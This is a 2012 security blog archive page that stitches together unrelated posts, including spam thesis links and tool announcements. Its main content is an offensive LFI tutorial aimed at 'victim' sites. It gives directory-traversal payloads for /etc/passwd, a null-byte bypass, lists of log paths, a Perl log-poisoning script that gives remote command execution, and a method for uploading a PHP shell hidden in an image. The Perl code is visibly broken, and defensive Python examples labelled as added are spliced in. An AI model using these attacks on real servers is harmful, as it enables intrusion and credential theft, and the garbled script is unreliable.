
How to build PHP queries with NAVICAT

Written By Unknown on Sunday 30 September 2012 | 23:01

Building PHP queries with NAVICAT
How to create an inner join between tables using NAVICAT
This approach is much easier than typing the query by hand, which takes quite a long time. With the help of the Navicat software it becomes easy; below are some examples of using Navicat.


For a clearer picture, try it out yourself, since that makes it easier to understand.

Hopefully this is useful.


10 Good & Free VPN

A compact Web Apps Vulnerable Scanner for amateur pentester [SecScan]

On Windows you need to install Python.

++++++++++++++++++++++++++++++++++
+ = Advance Web Apps Scanner = +
+ +
+ by +
+ +
+ Black Tiger Security +
+ +
+ now available +
+ +
+ in public +
++++++++++++++++++++++++++++++++++

Please choose one of these options below (enter numbers only):

=== Scanners:

[[READ: you don't have to enter
inurl, just stuff like
index.php?id= or .aspx?id=]]

[1] SQLi
[2] LFI
[3] XSS
[4] RFI

=== Other Tools:

[5] Route Checker
[6] Admin Page Finder
[7] Sub Domain Scan
[8] Dic MD5 cracker
[9] Online/Rainbow MD5 cracker
[10] Check local IP address 

  
https://code.google..../downloads/list

 
credit : BTsecruity 

Sample Education Management Theses

Click here to get a variety of sample Education Management theses. Education is inseparable from our lives, because education is very important for everyone. Education science is a broad field with many categories, one of which is Education Management. Research in education management inevitably relies on references. Here we can help you find references that fit the theme you have chosen. We provide references on education management in the Sample Education Management Theses list. The list presents a variety of different and interesting case studies, making them suitable as references for your education management thesis.



This collection of education management theses is an online topic covering education management. Many providers of education management theses can be reached by downloading.


For example, on the blog http://www.ilmiahpendidikan.com/p/tesis-pendidikan.html you can look for samples of various education management theses, human resource management (HRM) theses, marketing management theses and many other kinds of theses.

Or you can also visit http://www.ilmiahpendidikan.com/p/tesis-pendidikan.html, a blog that claims to be an online service provider with information on theses and undergraduate theses in Human Resource Management, Marketing Management, Education Management, Financial Management and others.

or at
http://www.ilmiahpendidikan.com/p/tesis-pendidikan.html which is also a collection of sample theses in Human Resource Management, Marketing Management, Financial Management, Accounting Management and Social Sciences in MS WORD format.

The following is a sample collection of Education Management theses that can be used as references.

ASCOOS Web Server (AWS) V1.3.15

The AWS is a special version of web server for all Web Developers and Web Designers and is based on Apache, Perl, multiple versions of PHP and MySQL, PostgreSQL, Filezilla, phpMyAdmin, phpPgAdmin, eXtplorer, etc. Installation in C:\

Features 

  • ASCOOS Web Server GUI Control 1.3.15
  • ASCOOS Web Server - Web Control Information (WCI) 0.1 beta5
  • Multilanguage, Skins
  • Apache 2.2.22
  • OpenSSL 1.0.1c
  • Filezilla FTP Server 0.9.41
  • Three (3) PHP Versions (5.2.17 - 5.3.17 - 5.4.7)
  • IonCube PHP encoder loaders 4.2.2 for PHP 5.2 - 5.3 - 5.4
  • Perl 5.16.1
  • Cache Accelerators: APC, eAccelerator, MemCache
  • Three (3) MySQL Database versions (5.1.66 - 5.5.28 - 5.6.7-rc)
  • PostgreSQL Database 9.1.6
  • MongoDB Database 2.0.7
  • Multiple SQLite Versions (2 and 3)
  • phpMyAdmin 3.5.2.2 - Web Interface for MySQL
  • phpPgAdmin 5.0.4 - Web Interface for PostgreSQL
  • rockMongo 1.1.0 - Web Interface for MongoDB
  • eXtplorer 2.1.0 RC5 - Web File Manager
  • browscap.ini version 5015
Updated to ASCOOS WEB SERVER 1.3.15 on 30/09/2012
Download ASCOOS WEB SERVER 1.3.15 (249.4 MB)
Download other versions from here

Source -
http://sourceforge.net/projects/awserver/

Visit website -
http://aws.ascoos.com/

Previous post regarding ASCOOS -
http://santoshdudhade.blogspot.in/2012/08/ascoos-web-server-aws-version-1313.html
http://santoshdudhade.blogspot.in/2012/08/ascoos-web-server-aws-v1311.html
http://santoshdudhade.blogspot.in/2012/06/ascoos-web-server-aws.html




Quadodo Login Script - PHP Login Script

The Quadodo Login Script is a free open-source php login script written in PHP and SQL. It is a stand-alone system and is one of a kind. This free login script is for anyone who wishes to allow users to sign up for their site. It comes with loads of features that include:
  • Cookies or Sessions
  • In-Depth Administration Panel
  • MySQL or PostgreSQL
  • Permission Masks
  • Grouping System
  • Paging System
  • Block Access to Public
  • Easily Integrated
  • Multiple Languages
  • Many More...
Download -
Quadodo Login Script Version: 3.1.9
Documentation: ChangeLog, User Guide, License, About
Released: March 11th, 2008
Full Downloads: qls-3.1.9.zip, qls-3.1.9.tar.bz2, qls-3.1.9.tar.gz
Changed Files Only: qls-3.1.9-cha...only.zip, qls-3.1.9-cha...only.tar.bz2, qls-3.1.9-cha...only.tar.gz


Source -
http://sourceforge.net/projects/qls/

Visit Website -
http://www.quadodo.net/


LFI and RFI videos tutorials

Basic Example of Local File Intrusion (LFI)





Remote File Inclusion Vulnerability[RFI] Hack





Shell upload via SQLi & LFI

 

 

 

 Local File Inclusion + Remote File Inclusion Defacing by 1nj3cth4x / Darkc0ke (HD)

 

credit to uploaders 

LFI Tutorial (local file inclusion)

Written By Unknown on Friday 28 September 2012 | 15:43

This tutorial walks through the process of exploiting a website through LFI (Local File Inclusion).

First, let's take a look at PHP code that is vulnerable to LFI:
Code:
<?php
// Deliberately vulnerable: the request parameter goes straight into include()
$page = $_GET['page'];
include($page);
?>
Now, this is a piece of code that should NEVER be used, because $page isn't sanitized and is passed directly to include(), but unfortunately (or not) it is very commonly found on the web.

OK, now that we know why it is vulnerable, let's start to use this to our advantage. First let's look at how this gives us the ability to "browse" through the web server. Imagine there's a file called test.php inside the test directory; typing victim.com/test/test.php retrieves that file, correct? But if the PHP code we examined were in index.php, we could also retrieve that file through victim.com/index.php?page=test/test.php. See what happened there? Now, if index.php were at victim.com/test/index.php and test.php at victim.com/test.php, you would have to type victim.com/test/index.php?page=../test.php. The ../ is called directory traversal; using it allows you to go up in the directories.


Now that we can go up and down through the server, let's use it to access files that we are not supposed to. If this is hosted on a Unix server, we can possibly view the password file of the server. To do this you will have to type something like this (the number of ../ may vary depending on where the vulnerable file is):
Code:
victim.com/index.php?page=../../../../../../../etc/passwd
If you don't know what to do with the content of etc/passwd then continue reading! The etc/passwd file is where the users/passwords are stored; a non-shadowed passwd file will look like this:



username:passwd:UID:GID:full_name:directory:shell

For example:


username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh

All you need to do then is grab the username and decode the password. If the passwd file is shadowed then you'll see something like this:


username:x:503:100:FullName:/home/username:/bin/sh

As you can see, the password is now an x and the encoded password is now in /etc/shadow (you will probably not have access to etc/shadow because it is only readable/writeable by root, while etc/passwd has to be readable by many processes, that's why you have access to it).

You can also sometimes see something like this:



username:!:503:100:FullName:/home/username:/bin/sh

The ! indicates that the encoded password is stored in the etc/security/passwd file.
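
For an administrator, the same field layout is a quick audit target. This added example (not part of the original tutorial) parses passwd records and reports hashes left in the world-readable file, empty password fields and extra UID 0 accounts; the sample records and function names are constructed, and treating * or a !-prefixed value as a locked account is an assumption based on common Linux convention.

```python
from dataclasses import dataclass

# Constructed sample in the seven-field layout shown above; not from a real host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
legacy:kbeMVnZM0oL7I:503:100:FullName:/home/legacy:/bin/sh
aixuser:!:504:100:FullName:/home/aixuser:/bin/sh
guest::505:100:Guest:/home/guest:/bin/sh
toor:x:0:0:Backup admin:/root:/bin/sh
broken:line:with:too:few
"""


@dataclass
class Finding:
    subject: str   # account name, or "line N" for records that do not parse
    severity: str  # "ok", "warn" or "high"
    reason: str


def classify_password_field(field):
    """Map field 2 of a passwd record to (severity, reason)."""
    if field == "":
        return "high", "empty password field: login needs no password"
    if field == "x":
        return "ok", "shadowed: hash is in /etc/shadow"
    if field == "!":
        return "ok", "hash is in /etc/security/passwd"
    if field.startswith(("*", "!")):
        # Assumption: common Linux convention for a locked account.
        return "ok", "locked: no usable password"
    # Anything else is treated as a hash stored in the world-readable file.
    return "high", "password hash readable by every local process"


def audit_passwd(text):
    """Return one Finding per record, plus one per extra UID 0 account."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(f"line {lineno}", "warn",
                                    f"expected 7 fields, got {len(fields)}"))
            continue
        user, password, uid = fields[0], fields[1], fields[2]
        findings.append(Finding(user, *classify_password_field(password)))
        if uid == "0" and user != "root":
            findings.append(Finding(user, "high", "second account with UID 0"))
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"{f.severity:5} {f.subject:8} {f.reason}")
```
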

Here are a couple of places that may be interesting to "visit":
Code:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
You will probably need to google these, as this is not the right tutorial for them.

Just one more quick thing: it's also common to find vulnerable code like:
Code:
<?php
// Deliberately vulnerable: a fixed ".php" suffix is the only "filter"
$page = $_GET["page"];
include("$page.php");
?>
In this case, as you can see, it adds .php to the end of whatever you include! So if you type in your browser:
Code:
victim.com/index.php?file=../../../../../../../../etc/passwd
it will retrieve:
victim.com/index.php?file=../../../../../../../../etc/passwd.php
That file doesn't exist, and you will see an error message, so you need to apply the null byte (%00):
Code:
victim.com/index.php?file=../../../../../../../../etc/passwd%00
With the null byte the server will ignore everything that comes after %00.



There are other ways to use the LFI exploit, so continue reading, the REAL fun is about to begin!


We will now try to run commands on the server. We will do this by injecting PHP code into the httpd logs and then accessing them through the LFI! To do this, first find out where the logs are stored; here are some locations that may be useful to you:
Code:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
OK, now that you know where the logs are, take a look at them and see what they store. In this example we will use a log that stores the "not found files" and the php code . You will then type in your browser victim.com/ and the php code will be logged because it "doesn't exist".

This possibly won't work because if you go look into the log you will probably see the php code like this:
Code:
%3C?%20passthru($_GET[cmd])%20?>
because your browser will URL-encode the whole thing! So you'll need to use something else; if you don't have a script of your own you can use this perl script I wrote:
Code:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="";
$log = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path.$code." HTTP/1.1
";
print $socket "User-Agent: ".$code."
";
print $socket "Host: ".$site."
";
print $socket "Connection: close

";
close($socket);
print "
Code $code sucssefully injected in $log
";

print "
Type command to run or exit to end: ";
$cmd = ;

while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1
";
print $socket "Host: ".$site."
";
print $socket "Accept: */*
";
print $socket "Connection: close

";

while ($show = <$socket>)
{
print $show;
}

print "Type command to run or exit to end: ";
$cmd = ;
}
Copy/paste that, save it as whatever.pl and change what is in bold accordingly to your victim site. If the vulnerable code is in victim.com/main/test.php you should change the /folder/ to /main/ , index.php= to test.php= and the ../../../../../../../etc/httpd/logs/error_log to where the log is at!

That script will inject the code and then will ask you for a command to run on the server! You know what to do now!


Last but not least, we will take a look at how to use the avatar/image upload function found in a lot of web applications.
You have possibly seen this in the "Local JPG Shell injection video" at milw0rm, but the best part, which was not mentioned there, is that the web application DOESN'T need to be installed on your victim website!

This is a quick explanation, for a better understanding you can view the video at :
Code:
http://www.milw0rm.com/video/watch.php?id=57
OR, IF you want a private way to upload shell in the server visit this link :
Code:
http://per1ova.com/showthread.php?t=400
This article is in the PREMIUM AREA so you need to be a VIP member

You need to "insert" the php code you want to execute inside the image, to do this you'll need to use your favorite hex editor or you can use the edjpgcom program (all you need to do is right click on the image, open with..., then select the edjpgcom program and then just type the code). Ok now that you have your shell in the image all you need to do is upload it! If your victim.com has a forum or something else that allows you to upload great, if not check if its in a shared hosting, if so do a reverse lookup on it!


Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image all you need to do is take some time to browse thru them until you find one!


After you have found one and uploaded your image, here is the tricky part: you'll need to "create" an error on it (in order to find the server path to it)! Try, for example, creating a MySQL error and you will get something like this:
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sitefolder/public_html/includes/view.php on line 37
If you can't force an error go back to the etc/passwd file:

Code:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
As you can see the username is also the directory name, most of the times the name is similar to the domain name, but if not the case you'll have to try them until you find the one you're looking for!


Go to your avatar image, right click on it and then choose properties (write down the path to it); you're now all set up.

In your browser type this (again, the number of ../ may vary):
Code:
victim.com/index.php=../../../../../../../../../home/the_other_site_dir/public_html/path_to_your_avatar/avatar.jpg
In other "words", it should look like this (using fictitious "names"):

Code:
victim.com/index.php=../../../../../../../../../home/arcfull/public_html/forum/uploads/avatar.jpg
After you type this you will see the result of the code inserted in the image!
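
From the defending side, an upload handler can look for the embedded code before the file is ever stored. This added example (not part of the original tutorial) walks the JPEG header segments, pulls out the comment (COM) segments that a JPEG comment editor writes to, and rejects files carrying a PHP open tag; the function names and both sample files are constructed for illustration.

```python
import struct


def _segment(marker, payload):
    """Build one JPEG segment: 0xFF, marker byte, 2-byte length, payload."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed minimal files (header segments only, no image data) for the demo.
_APP0 = _segment(0xE0, b"JFIF\x00" + bytes(9))
CLEAN_JPEG = b"\xff\xd8" + _APP0 + _segment(0xFE, b"holiday photo") + b"\xff\xd9"
TAINTED_JPEG = (b"\xff\xd8" + _APP0
                + _segment(0xFE, b"<?php /* constructed marker */ ?>") + b"\xff\xd9")


def jpeg_comments(data):
    """Return the payload of every COM (0xFFFE) segment before the image data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker")
    comments, pos = [], 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                      # fill byte before a marker
            pos += 1
            continue
        if marker in (0xD9, 0xDA):              # EOI, or SOS: scan data follows
            break
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # markers without a length
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        end = pos + 2 + length
        if length < 2 or end > len(data):
            raise ValueError(f"bad segment length at offset {pos}")
        if marker == 0xFE:
            comments.append(data[pos + 4:end])
        pos = end
    return comments


def check_upload(data):
    """Return reasons to reject an avatar upload; an empty list means accept."""
    try:
        comments = jpeg_comments(data)
    except ValueError as exc:
        return [f"not a well-formed JPEG: {exc}"]
    reasons = []
    if any(b"<?" in c for c in comments):
        reasons.append("PHP open tag inside a JPEG comment segment")
    if b"<?php" in data.lower():
        reasons.append("PHP open tag somewhere in the file")
    return reasons
```

A byte scan cannot catch every short-tag variant, so re-encoding accepted images and keeping the upload directory out of reach of any include() path remain the primary controls.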


source : http://penetrationengineer.blogspot.com/ 
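
The requests described in this tutorial leave recognisable traces in the web server's access log. This added example (not from the original post) flags directory traversal, null bytes, reads of the listed /etc files, inclusion of log or uploaded image paths, and PHP tags written into logged fields; the log lines and rule names are constructed, and the Apache combined log format is assumed.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined format); addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [28/Sep/2012:15:40:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Sep/2012:15:41:10 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Sep/2012:15:41:30 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Sep/2012:15:42:02 +0000] "GET /missing HTTP/1.1" 404 0 "-" "<?php /* constructed marker */ ?>"
203.0.113.9 - - [28/Sep/2012:15:42:40 +0000] "GET /index.php?page=../../../var/log/apache2/access.log HTTP/1.1" 200 90 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Sep/2012:15:43:05 +0000] "GET /index.php?page=../../home/site/public_html/forum/uploads/avatar.jpg HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

# Each rule is checked against the percent-decoded request target.
TARGET_RULES = [
    ("traversal", re.compile(r"\.\.[/\\]")),
    ("null_byte", re.compile(r"\x00")),
    ("sensitive_file", re.compile(r"/etc/(passwd|shadow|group|security/)")),
    ("log_include", re.compile(r"(access|error)[._]log")),
    ("media_include",
     re.compile(r"\.\.[/\\].*\.(jpe?g|png|gif)(\x00|[?&#]|$)", re.I)),
]
PHP_TAG = re.compile(r"<\?(php|=|\s)", re.I)


def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded ../ and %00 are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(lines):
    """Return (ip, status, tags) for every request that matches a rule."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        target = decode(m["target"])
        tags = [name for name, rule in TARGET_RULES if rule.search(target)]
        # PHP written into a logged field is the log-injection step described above.
        if any(PHP_TAG.search(decode(m[f])) for f in ("target", "referer", "agent")):
            tags.append("php_tag")
        if tags:
            hits.append((m["ip"], int(m["status"]), tags))
    return hits


if __name__ == "__main__":
    for ip, status, tags in scan(SAMPLE_LOG.splitlines()):
        print(ip, status, ",".join(tags))
```

A 200 status on a request tagged traversal or log_include deserves attention first, since it suggests the include succeeded rather than failed.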

mitmproxy - an SSL-capable man-in-the-middle proxy

mitmproxy is an SSL-capable man-in-the-middle proxy for HTTP. It provides a console interface that allows traffic flows to be inspected and edited on the fly.

mitmdump is the command-line version of mitmproxy, with the same functionality but without the user interface. Think tcpdump for HTTP.

Features
  • Intercept HTTP requests and responses and modify them on the fly.
  • Save complete HTTP conversations for later replay and analysis.
  • Replay the client-side of an HTTP conversation.
  • Replay HTTP responses of a previously recorded server.
  • Reverse proxy mode to forward traffic to a specified server.
  • Make scripted changes to HTTP traffic using Python.
  • SSL certificates for interception are generated on the fly.
Install

The easiest way to install the latest release of mitmproxy is to use pip: pip install mitmproxy

For further instructions, see the Installation section of the documentation.

Download
Requirements
  • The following auxiliary components may be needed if you plan to hack on mitmproxy:
      • The test suite uses the pry unit testing library.
      • Rendering the documentation requires countershape.
  • mitmproxy is tested and developed on OSX, Linux and OpenBSD. Windows is not supported at the moment.
  • You should also make sure that your console environment is set up with the following:
      • EDITOR environment variable to determine the external editor.
      • PAGER environment variable to determine the external pager.
      • Appropriate entries in your mailcap files to determine external viewers for request and response contents.
Source -
http://mitmproxy.org/index.html

Lynis - Security and system auditing tool

Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Besides security-related information, it also scans for general system information, installed packages and configuration mistakes.

This software aims to assist with automated auditing, software patch management, and vulnerability and malware scanning of Unix-based systems. It can be run without prior installation, so inclusion on read-only storage is no problem (USB stick, CD/DVD).

Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOX (Sarbanes-Oxley) compliance audits.

Intended audience:
Security specialists, penetration testers, system auditors, system/network managers.

Examples of audit tests:
- Available authentication methods
- Expired SSL certificates
- Outdated software
- User accounts without password
- Incorrect file permissions
- Firewall auditing


System requirements:

- Compatible operating system (see 'Supported operating systems')
- Default shell
Supported operating systems
Tested on:
- Arch Linux
- CentOS
- Debian
- Fedora Core 4 and higher
- FreeBSD
- Gentoo
- Knoppix
- Mac OS X
- Mandriva 2007
- OpenBSD 4.x
- OpenSolaris
- OpenSuSE
- PcBSD
- PCLinuxOS
- Red Hat, RHEL 5.x
- Slackware 12.1
- Solaris 10
- Ubuntu
Downloads

1.3.0 - Latest release
1.2.9 - Previous release

Packages

Lynis RPM (spec)
Non-official RPM's (by Peter Linnell) 
Debian package
Lynis Demo


Documentation


Source -

http://www.rootkit.nl/projects/lynis.html



 